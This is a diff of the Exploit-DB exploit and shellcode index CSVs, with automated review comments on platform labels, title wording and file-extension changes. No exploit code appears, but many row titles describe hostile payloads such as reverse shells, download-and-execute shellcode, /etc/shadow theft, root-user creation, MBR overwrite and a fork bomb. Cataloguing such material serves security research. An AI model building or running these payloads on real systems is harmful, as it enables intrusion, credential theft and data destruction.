38822,exploits/windows/webapps/38822.rb,"Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection (Metasploit)",2015-11-28,hland,webapps,windows,8080
38822,exploits/windows/webapps/38822.rb,"SysAid Help Desk Software 14.4.32 b25 - SQL Injection (Metasploit)",2015-11-28,hland,webapps,windows,8080
38831,exploits/php/webapps/38831.txt,"HumHub 0.11.2/0.20.0-beta.2 - SQL Injection",2015-11-30,"LSE Leading Security Experts GmbH",webapps,php,80
38828,exploits/php/webapps/38828.php,"Limonade Framework - 'limonade.php' Local File Disclosure",2013-11-17,"Yashar shahinzadeh",webapps,php,
38830,exploits/php/webapps/38830.txt,"MyCustomers CMS 1.3.873 - SQL Injection",2015-11-30,"Persian Hack Team",webapps,php,80
@ -36731,7 +36734,7 @@ id,file,description,date,author,type,platform,port
39282,exploits/php/webapps/39282.txt,"WordPress Plugin GB Gallery Slideshow - '/wp-admin/admin-ajax.php' SQL Injection",2014-08-11,"Claudio Viviani",webapps,php,
39283,exploits/php/webapps/39283.txt,"WordPress Plugin FB Gorilla - 'game_play.php' SQL Injection",2014-07-28,Amirh03in,webapps,php,
39287,exploits/php/webapps/39287.txt,"WordPress Plugin WP Content Source Control - 'download.php' Directory Traversal",2014-08-19,"Henri Salo",webapps,php,
39288,exploits/multiple/webapps/39288.txt,"ManageEngine Password Manager Pro and ManageEngine IT360 - SQL Injection",2014-08-20,"Pedro Ribeiro",webapps,multiple,
39288,exploits/multiple/webapps/39288.txt,"ManageEngine Password Manager Pro / ManageEngine IT360 - SQL Injection",2014-08-20,"Pedro Ribeiro",webapps,multiple,
39289,exploits/php/webapps/39289.txt,"ArticleFR - 'id' SQL Injection",2014-08-20,"High-Tech Bridge",webapps,php,
39290,exploits/php/webapps/39290.txt,"MyAwards MyBB Module - Cross-Site Request Forgery",2014-08-22,Vagineer,webapps,php,
39291,exploits/php/webapps/39291.txt,"WordPress Plugin KenBurner Slider - 'admin-ajax.php' Arbitrary File Download",2014-08-24,MF0x,webapps,php,
@ -37268,6 +37271,17 @@ id,file,description,date,author,type,platform,port
43869,exploits/php/webapps/43869.txt,"Flexible Poll 1.2 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,
43870,exploits/php/webapps/43870.txt,"Professional Local Directory Script 1.0 - SQL Injection",2018-01-24,"Ihsan Sencan",webapps,php,
43872,exploits/php/webapps/43872.html,"WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure",2018-01-24,"ThreatPress Security",webapps,php,
43883,exploits/windows/webapps/43883.txt,"BMC Track-It! 11.4 - Multiple Vulnerabilities",2015-09-28,"Pedro Ribeiro",webapps,windows,
43884,exploits/hardware/webapps/43884.txt,"Billion / TrueOnline / ZyXEL Routers - Multiple Vulnerabilities",2017-01-31,"Pedro Ribeiro",webapps,hardware,
43885,exploits/hardware/webapps/43885.txt,"SysAid Help Desk 14.4 - Multiple Vulnerabilities",2015-06-10,"Pedro Ribeiro",webapps,hardware,
43886,exploits/hardware/webapps/43886.txt,"Pimcore CMS 1.4.9 <2.1.0 - Multiple Vulnerabilities",2014-10-12,"Pedro Ribeiro",webapps,hardware,
43888,exploits/php/webapps/43888.txt,"GetSimple CMS 3.3.1 - Cross-Site Scripting",2014-10-12,"Pedro Ribeiro",webapps,php,
43889,exploits/php/webapps/43889.txt,"CMS Made Simple 1.11.9 - Multiple Vulnerabilities",2014-10-12,"Pedro Ribeiro",webapps,php,
43892,exploits/multiple/webapps/43892.txt,"ManageEngine Desktop Central - Create Administrator",2015-01-15,"Pedro Ribeiro",webapps,multiple,
43893,exploits/multiple/webapps/43893.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities (2)",2014-11-05,"Pedro Ribeiro",webapps,multiple,
43894,exploits/multiple/webapps/43894.txt,"ManageEngine OpManager / Applications Manager / IT360 - 'FailOverServlet' Multiple Vulnerabilities",2015-02-09,"Pedro Ribeiro",webapps,multiple,
43895,exploits/multiple/webapps/43895.txt,"ManageEngine Netflow Analyzer / IT360 - Arbitrary File Download",2014-12-03,"Pedro Ribeiro",webapps,multiple,
43896,exploits/multiple/webapps/43896.txt,"ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities",2014-11-09,"Pedro Ribeiro",webapps,multiple,
40542,exploits/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php,
40543,exploits/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
40544,exploits/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
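Review bot: the new rows 43885 (SysAid Help Desk 14.4) and 43886 (Pimcore CMS) are filed under exploits/hardware/webapps with platform "hardware", but both are software products; the existing SysAid row 38822 in this same diff is windows/webapps, and Pimcore is a PHP application. Move them to a matching platform directory and platform value, because consumers filtering the CSV by platform will otherwise miss them. Two smaller title points in the same hunk: "1.4.9 <2.1.0" in 43886 lacks the space used in "2.5 < 3.6.5" (row 43877), and 43888 uses "GetSimple CMS" while rows 12517, 35726 and 37587 are renamed to "Getsimple CMS" in this same change.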
@ -37373,6 +37387,7 @@ id,file,description,date,author,type,platform,port
40940,exploits/php/webapps/40940.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (1)",2016-12-16,"Lenon Leite",webapps,php,
40941,exploits/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",webapps,php,
40942,exploits/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",webapps,multiple,
43882,exploits/asp/webapps/43882.rb,"Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - Authenticated Arbitrary File Upload",2015-09-28,"Pedro Ribeiro",webapps,asp,
40961,exploits/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",webapps,multiple,
40966,exploits/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,webapps,php,
40968,exploits/php/webapps/40968.php,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",webapps,php,
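Review bot: the new row 43882 points at a .rb file but its title has no "(Metasploit)" suffix, unlike the other .rb rows credited to the same author in this diff (for example 41719). If 43882.rb is a Metasploit module, add the suffix so it is found by the same title filter as the others; if it is a standalone Ruby script, the title is fine as it stands.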


@ -1,5 +1,5 @@
id,file,description,date,author,type,platform
14113,shellcodes/arm/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
14113,shellcodes/arm/14113.c,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
13241,shellcodes/aix/13241.c,"AIX - execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix
13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
@ -36,8 +36,8 @@ id,file,description,date,author,type,platform
13276,shellcodes/freebsd_x86/13276.c,"FreeBSD/x86 - chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,freebsd_x86
13277,shellcodes/freebsd_x86/13277.c,"FreeBSD/x86 - execve(/tmp/sh) Shellcode (34 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,freebsd_x86
13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86
13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",shellcode,freebsd_x86-64
13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64
13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",shellcode,freebsd_x86-64
13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x64 - execve(/bin/sh) Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64
13281,shellcodes/generator/13281.c,"Linux/x86 - execve() + Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator
13282,shellcodes/generator/13282.php,"Linux/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
13283,shellcodes/generator/13283.php,"Windows (XP SP1) - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
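Review bot: the titles of 13279 and 13280 now read "FreeBSD/x64" while the file path and the platform column in the same rows still read freebsd_x86-64, so the description and the platform field disagree on the architecture name. The later hunks do the same for the linux_x86-64 rows (13296, 13320, 13463, 13464). Either document that titles use "x64" and the platform column keeps "x86-64", or rename both together, so that anyone matching title text against the platform value is not caught out.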
@ -51,8 +51,8 @@ id,file,description,date,author,type,platform
13292,shellcodes/hardware/13292.asm,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Varun Uppal",shellcode,hardware
13293,shellcodes/hardware/13293.asm,"Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
13295,shellcodes/hp-ux/13295.c,"HP-UX - execve(/bin/sh) Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux
13296,shellcodes/linux_x86-64/13296.c,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,shellcode,linux_x86-64
13297,shellcodes/generator/13297.c,"Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator
13296,shellcodes/linux_x86-64/13296.c,"Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,shellcode,linux_x86-64
13297,shellcodes/generator/13297.c,"Linux/x64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator
13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
13299,shellcodes/linux_mips/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
13300,shellcodes/linux_mips/13300.c,"Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes)",2005-11-09,core,shellcode,linux_mips
@ -75,7 +75,7 @@ id,file,description,date,author,type,platform
13317,shellcodes/linux_x86/13317.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
13318,shellcodes/linux_x86/13318.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
13319,shellcodes/linux_x86/13319.s,"Linux/x86 - Bind TCP (8000/TCP) Shell (/bin/sh) Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",shellcode,linux_x86
13320,shellcodes/linux_x86-64/13320.c,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,shellcode,linux_x86-64
13320,shellcodes/linux_x86-64/13320.c,"Linux/x64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,shellcode,linux_x86-64
13321,shellcodes/linux_x86/13321.c,"Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes)",2009-04-30,phar,shellcode,linux_x86
13322,shellcodes/linux_x86/13322.c,"Linux/x86 - File Unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,shellcode,linux_x86
13323,shellcodes/linux_x86/13323.c,"Linux/x86 - Perl Script Execution Shellcode (99+ bytes)",2009-03-03,darkjoker,shellcode,linux_x86
@ -179,7 +179,7 @@ id,file,description,date,author,type,platform
13421,shellcodes/linux_x86/13421.c,"Linux/x86 - Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)",2004-12-22,xort,shellcode,linux_x86
13422,shellcodes/linux_x86/13422.c,"Linux/x86 - execve() Shellcode (23 bytes)",2004-11-15,marcetam,shellcode,linux_x86
13423,shellcodes/linux_x86/13423.c,"Linux/x86 - execve(_/bin/ash__0_0) Shellcode (21 bytes)",2004-11-15,zasta,shellcode,linux_x86
13424,shellcodes/linux_x86/13424.txt,"Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
13424,shellcodes/linux_x86/13424.c,"Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes)",2004-09-26,RaiSe,shellcode,linux_x86
13425,shellcodes/linux_x86/13425.c,"Linux/IA32 - execve(/bin/sh) + 0xff-Free Shellcode (45 bytes)",2004-09-26,anathema,shellcode,linux_x86
13426,shellcodes/bsd_x86/13426.c,"BSD/x86 - symlink /bin/sh + XORing Encoded Shellcode (56 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13427,shellcodes/linux_x86/13427.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)",2004-09-26,Tora,shellcode,linux_x86
@ -218,8 +218,8 @@ id,file,description,date,author,type,platform
13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86
13461,shellcodes/linux_x86/13461.c,"Linux/x86 - Add Root User (z) To /etc/passwd Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,linux_x86
13462,shellcodes/linux_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve(/bin/sh) Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,linux_x86
13463,shellcodes/linux_x86-64/13463.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64
13464,shellcodes/linux_x86-64/13464.s,"Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,shellcode,linux_x86-64
13463,shellcodes/linux_x86-64/13463.c,"Linux/x64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64
13464,shellcodes/linux_x86-64/13464.s,"Linux/x64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,shellcode,linux_x86-64
13465,shellcodes/multiple/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",shellcode,multiple
13466,shellcodes/multiple/13466.c,"OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,shellcode,multiple
13467,shellcodes/multiple/13467.c,"Linux/x86 / Unix/SPARC / IRIX/MIPS - execve(/bin/sh) Shellcode (141 bytes)",2004-09-12,dymitri,shellcode,multiple
@ -229,7 +229,7 @@ id,file,description,date,author,type,platform
13471,shellcodes/netbsd_x86/13471.c,"NetBSD/x86 - Reverse TCP (6666/TCP) Shell Shellcode (83 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13472,shellcodes/netbsd_x86/13472.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (29 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13473,shellcodes/netbsd_x86/13473.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (30 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13474,shellcodes/netbsd_x86/13474.txt,"NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86
13474,shellcodes/netbsd_x86/13474.c,"NetBSD/x86 - execve(/bin/sh) Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86
13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve(/bin/sh) Shellcode (23 bytes)",2006-05-01,hophet,shellcode,openbsd_x86
13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind TCP (6969/TCP) Shell Shellcode (148 bytes)",2004-09-26,"Sinan Eren",shellcode,openbsd_x86
13477,shellcodes/openbsd_x86/13477.c,"OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes)",2004-09-26,anonymous,shellcode,openbsd_x86
@ -249,16 +249,16 @@ id,file,description,date,author,type,platform
13491,shellcodes/generator/13491.c,"Solaris/MIPS - Reverse TCP (10.0.0.3:44434/TCP) Shell + XNOR Encoded Traffic Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator
13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid() + execve() Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13494,shellcodes/solaris_sparc/13494.txt,"Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc
13494,shellcodes/solaris_sparc/13494.c,"Solaris/SPARC - execve(/bin/sh) Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc
13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc
13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc
13497,shellcodes/solaris_sparc/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc
13497,shellcodes/solaris_sparc/13497.c,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc
13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",shellcode,generator
13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) + Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
13500,shellcodes/solaris_x86/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
13501,shellcodes/solaris_x86/13501.txt,"Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13502,shellcodes/solaris_x86/13502.txt,"Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13503,shellcodes/unixware/13503.txt,"UnixWare - execve(/bin/sh) Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware
13501,shellcodes/solaris_x86/13501.c,"Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13502,shellcodes/solaris_x86/13502.c,"Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13503,shellcodes/unixware/13503.c,"UnixWare - execve(/bin/sh) Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware
13504,shellcodes/windows_x86/13504.asm,"Windows/x86 (5.0 < 7.0) - Bind TCP (28876/TCP) Shell + Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86
13505,shellcodes/windows_x86/13505.c,"Windows/x86 (XP SP2) (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,windows_x86
13507,shellcodes/windows_x86/13507.txt,"Windows/x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,windows_x86
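Review bot: the `file` column for 13494, 13497, 13501, 13502 and 13503 switches from `.txt` to `.c`, but this hunk only shows the index row changing. Confirm that the same commit renames the files themselves under `shellcodes/solaris_sparc/`, `shellcodes/solaris_x86/` and `shellcodes/unixware/`; otherwise the index points at paths that do not exist, and any tooling that resolves entries by this column will fail on those five ids.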
@ -268,7 +268,7 @@ id,file,description,date,author,type,platform
13511,shellcodes/windows_x86/13511.c,"Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,shellcode,windows_x86
13512,shellcodes/windows_x86/13512.c,"Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,windows_x86
13513,shellcodes/windows_x86/13513.c,"Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + ASCII Printable Shellcode (49 bytes)",2008-09-03,Koshi,shellcode,windows_x86
13514,shellcodes/windows_x86/13514.asm,"Windows/x86 - Reverse TCP + Download A File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86
13514,shellcodes/windows_x86/13514.asm,"Windows/x86 - Reverse TCP + Download File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86
13515,shellcodes/generator/13515.pl,"Windows/x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",shellcode,generator
13516,shellcodes/windows_x86/13516.asm,"Windows/x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,shellcode,windows_x86
13517,shellcodes/windows_x86/13517.asm,"Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)",2007-06-14,Weiss,shellcode,windows_x86
@ -287,7 +287,7 @@ id,file,description,date,author,type,platform
13530,shellcodes/windows_x86/13530.asm,"Windows (XP) - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) + Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",shellcode,windows_x86
13531,shellcodes/windows_x86/13531.c,"Windows (XP SP1) - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)",2004-09-26,silicon,shellcode,windows_x86
13532,shellcodes/windows_x86/13532.asm,"Windows - DCOM RPC2 Universal Shellcode",2003-10-09,anonymous,shellcode,windows_x86
13533,shellcodes/windows_x86-64/13533.asm,"Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,windows_x86-64
13533,shellcodes/windows_x86-64/13533.asm,"Windows/x64 - URLDownloadToFileA(http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,windows_x86-64
13548,shellcodes/linux_x86/13548.asm,"Linux/x86 - Kill All Processes Shellcode (9 bytes)",2010-01-14,root@thegibson,shellcode,linux_x86
13549,shellcodes/linux_x86/13549.c,"Linux/x86 - setuid(0) + execve(/sbin/poweroff -f) Shellcode (47 bytes)",2009-12-04,ka0x,shellcode,linux_x86
13550,shellcodes/linux_x86/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,shellcode,linux_x86
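Review bot: on 13533 the title prefix becomes `Windows/x64` while the path and the platform column in the same row stay `windows_x86-64`, so the row now names the architecture two different ways. If the platform value is meant to remain the canonical key, say so in the commit message. Anyone who filters this index by title prefix (`x86-64`) will silently stop matching this entry after the rename.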
@ -295,7 +295,7 @@ id,file,description,date,author,type,platform
13553,shellcodes/linux_x86/13553.c,"Linux/x86 - execve() Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",shellcode,linux_x86
13560,shellcodes/windows/13560.txt,"Windows (XP SP2) - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,shellcode,windows
13563,shellcodes/linux_x86/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,shellcode,linux_x86
13565,shellcodes/windows_x86/13565.asm,"Windows/x86 (XP SP3) - ShellExecuteA Shellcode",2009-12-19,sinn3r,shellcode,windows_x86
13565,shellcodes/windows_x86/13565.asm,"Windows/x86 (XP SP3) - ShellExecuteA() Shellcode",2009-12-19,sinn3r,shellcode,windows_x86
13566,shellcodes/linux_x86/13566.c,"Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,shellcode,linux_x86
13569,shellcodes/windows_x86/13569.asm,"Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode",2009-12-24,sinn3r,shellcode,windows_x86
13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86
@ -304,16 +304,16 @@ id,file,description,date,author,type,platform
13574,shellcodes/windows_x86/13574.c,"Windows/x86 (XP SP2) (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86
13576,shellcodes/linux_x86/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,shellcode,linux_x86
13577,shellcodes/linux_x86/13577.txt,"Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,linux_x86
13578,shellcodes/linux_x86/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,linux_x86
13578,shellcodes/linux_x86/13578.asm,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,linux_x86
13579,shellcodes/linux_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes)",2009-12-31,$andman,shellcode,linux_x86
13581,shellcodes/windows/13581.txt,"Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows
13582,shellcodes/windows/13582.txt,"Windows (XP Professional SP2) (English) - Wordpad.exe + Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows
13586,shellcodes/linux_x86/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,linux_x86
13586,shellcodes/linux_x86/13586.asm,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,linux_x86
13595,shellcodes/windows_x86/13595.c,"Windows/x86 (XP SP2) (French) - calc.exe Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,shellcode,windows_x86
13599,shellcodes/linux_x86/13599.txt,"Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13600,shellcodes/linux_x86/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13601,shellcodes/linux_x86/13601.txt,"Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13602,shellcodes/linux_x86/13602.txt,"Linux/i686 - pacman -R <package> Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13599,shellcodes/linux_x86/13599.c,"Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13600,shellcodes/linux_x86/13600.c,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13601,shellcodes/linux_x86/13601.c,"Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13602,shellcodes/linux_x86/13602.c,"Linux/i686 - pacman -R <package> Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13609,shellcodes/linux_x86/13609.c,"Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (43 bytes)",2010-02-09,fb1h2s,shellcode,linux_x86
13614,shellcodes/windows_x86/13614.c,"Windows/x86 (XP SP3) (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
